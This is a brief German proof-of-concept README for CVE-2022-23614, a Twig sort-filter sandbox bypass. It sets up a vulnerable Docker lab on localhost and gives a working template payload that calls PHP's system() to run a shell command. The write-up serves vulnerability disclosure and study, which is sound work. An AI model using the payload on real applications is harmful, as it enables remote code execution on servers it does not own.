
Proof-of-Concept-Exploit für CVE-2022-23614, der die Ausführung beliebigen Codes durch Umgehung der Sandbox des Twig-Sortierfilters in PHP-Anwendungen demonstriert.
PoC für CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (Codeausführung/Sandbox-Umgehung über den Twig-sort-Filter)
Wie in diesem Commit zu sehen ist – https://github.com/twigphp/Twig/commit/.. – übergab Twig den vom Benutzer angegebenen Funktionsnamen als Callback-Parameter an uasort (hier), was zu beliebiger Codeausführung führte.
Um den Docker-Container mit einer anfälligen Twig-Version zu erstellen und auszuführen
$ ./build-docker.sh
Öffne die Webseite unter localhost:1337 und versuche, den folgenden Payload zu rendern
{{ ['id','']|sort('system') }}
PoC

Ergebnis
